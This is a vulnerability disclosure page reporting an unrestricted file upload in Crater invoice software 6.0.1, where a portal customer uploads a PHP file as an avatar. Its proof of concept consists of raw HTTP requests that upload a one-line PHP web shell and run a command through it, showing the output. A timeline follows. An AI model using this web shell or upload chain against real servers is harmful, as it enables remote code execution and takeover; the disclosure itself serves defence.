Unrestricted Upload of File with Dangerous Type in crater-invoice/crater

Valid

Reported on

Jan 12th 2022

Description

In recent Crater version (e3f3809f tag: 6.0.1) customer with enabled portal function can upload PHP file instead of avatar.

Proof of Concept

POST /api/v1/company-name/customer/profile HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6Ikx4QXV1aFRmR041UnlLUDB2ZVpMcVE9PSIsInZhbHVlIjoidUtEdlM2NGVwZzY5VzJVK2VDOXNzaEFERVhURHV4bXVFdksxY0VseTNkOG1ocUJQdWR1TDJzUzEvVHV1YXlHa1dBQ2pJdEticjZtKzdSK0VWREFwTVMwWU1OZDI2cXBJTXpsTGROMk1PSkhXeHFUNFJBS1FNRkpSS2dPVjl0TnIiLCJtYWMiOiI5OTNmZDk5YjdjMDY1MDdjYTI2ZGVjZDk4YzFkODE4ZGE4MjM3YTFjZmFkYjcxODc2ZTMzMGZiZDgwY2U1NGE3IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------5158019571396084471843173425
Content-Length: 496
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/company-name/customer/settings/customer-profile
Cookie: XSRF-TOKEN=eyJpdiI6Ikx4QXV1aFRmR041UnlLUDB2ZVpMcVE9PSIsInZhbHVlIjoidUtEdlM2NGVwZzY5VzJVK2VDOXNzaEFERVhURHV4bXVFdksxY0VseTNkOG1ocUJQdWR1TDJzUzEvVHV1YXlHa1dBQ2pJdEticjZtKzdSK0VWREFwTVMwWU1OZDI2cXBJTXpsTGROMk1PSkhXeHFUNFJBS1FNRkpSS2dPVjl0TnIiLCJtYWMiOiI5OTNmZDk5YjdjMDY1MDdjYTI2ZGVjZDk4YzFkODE4ZGE4MjM3YTFjZmFkYjcxODc2ZTMzMGZiZDgwY2U1NGE3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InN5YS95WTdzcTR1MlRnUmdFTk1OMVE9PSIsInZhbHVlIjoic0FkYzkrUmxHR3NGcThKZWJqZmVPKzdvYWZJelV2WVdjVjgwVmc3VFNEVzlBL1hCTG9LaHlqYUNHbm9oQldPNGNZbkxtYWVxVUZQT0RrTVN3bXo3bDcvOG55UXh6anN4Q2F0VVcyeW5nOFFHYkl3b05STmlEL1RCekVEdElkUzIiLCJtYWMiOiJjZjIxNjYzYjBjZmQ3ZjQxY2ZkY2IzZDllZGUwYjRjN2UzOTI3NDQxZWVlZDU0YjQ4ZmYzOTQxZTc3ZDRjYjViIiwidGFnIjoiIn0%3D; CRheUEen6HBSalAVkV3sV0y6xmAshdCCeNATWiuZ=eyJpdiI6ImdGSTdGZzYyVFZUTUFubmdKMkxLZ3c9PSIsInZhbHVlIjoib2pMUnlpTjlvVFBwa0sxUFBwdUkwOWhueG1MRzlGYzVKV1hFVHY3Uml5b2RISjhYRS9iU3FrYTFZMERNakRHajk3dUFxN3JySWQ1akJQVXJhczJRWW5SMkpremttc3dMQVJyZ040Z3pxRFJOeldKU1JLcGpqZ0plSzlaVW41amI3clZSVWJsT3BxdVAyaUxBekxlMEVLMHpBWklWc0F2TlVSbkpWUWtIeXN5SjVEV3dQMUFNTUYyVzB4ZSs5U0pCb1c5NVI1aXVXcHgzRFp2RTVpZG5nV3IyRVBkZ3I0TklFTVhKY2xXY3lEdnY2Ni93aE5rYWxQYVE5UklNd1hxTEszNXJ0cy9US3czSkFpNVptdUZGUFpJS0lJbmFiUElxRWJLWVhod1g0MU9zaE5vaXpQVUFVOWprcFRNN3QwR3VwRVhMU0J1eWd6L2VxY24rVGxFQ25Mc1hhQ04xSUpqVnZtaCtFRngra3ZOd0ozM2VVSk80VjlISDU5OVNTVDI4Z1ZOUzBZTWg0ZWJtNWE4ZFkzdjhhcUZUYm1IVy83Qjc0akJqTjU3eGkyMFFSZ3BPbWRtOXJ0clFvelJVa2JHTzQvUjBpQTlxVzZ2WGRWQ1RkUWljU1V5UWpOVloxSlM5c054RkhiYmNObzZiUm9ONTVLUG90cytUa1lRQmNwaFlFZ0N0enU1a0JmamxUMWI3R0hnMjg2allEelMrSUNmRi9KSGRkelgwM2J5bE92Y0g4SDdkVEx1N0VQUTMyTnp0U2ZkVGp2OGxEb0piSGtIbkJESzlkQT09IiwibWFjIjoiMGNlNWI3Y2RmZDI2Zjg4MWM1YTQ2ODIyNmM5NTIxY2I3ODc3Y2EzOWE5ZTE4YTZlYmFkOGZmNWIyY2Q0M2YzMSIsInRhZyI6IiJ9

-----------------------------5158019571396084471843173425
Content-Disposition: form-data; name="name"

customer
-----------------------------5158019571396084471843173425
Content-Disposition: form-data; name="email"

customer-crater@zaqwsx.cc
-----------------------------5158019571396084471843173425
Content-Disposition: form-data; name="customer_avatar"; filename="s.php"
Content-Type: application/x-php

<?=`$_GET[1]`?>
-----------------------------5158019571396084471843173425--

In response You can find link to uploaded file in data->avatar

{
    "data":
    {
        "id": 1,
        "name": "customer",
        "email": "customer-crater@zaqwsx.cc",
        "phone": null,
...
        "avatar": "http:\/\/172.17.0.1:8888\/storage\/33\/s.php",
        "prefix": null,
...
    }
}

GET /storage/33/s.php?1=id HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: (...)
Upgrade-Insecure-Requests: 1


HTTP/1.1 200 OK
Host: 172.17.0.1:8888
Date: Wed, 12 Jan 2022 17:18:57 GMT
Connection: close
X-Powered-By: PHP/7.4.27
Content-type: text/html; charset=UTF-8

uid=1000(x) gid=1000(x) groups=1000(x),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),127(vboxusers),999(docker)

Impact

This vulnerability is high and leads to code execution

References

https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

We are processing your report and will contact the crater-invoice/crater team within 24 hours. a year ago

We have contacted a member of the crater-invoice/crater team and are waiting to hear back a year ago

We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. a year ago

A crater-invoice/crater maintainer validated this vulnerability a year ago

theworstcomrade has been awarded the disclosure bounty

The fix bounty is now up for grabs

A crater-invoice/crater maintainer marked this as fixed in 6.0 with commit dcb3dd a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

theworstcomrade

commented a year ago

Researcher

@maintainer @admin the commit mentioned above does not fix the bug. I created PR with proper fix https://github.com/crater-invoice/crater/pull/732

to join this conversation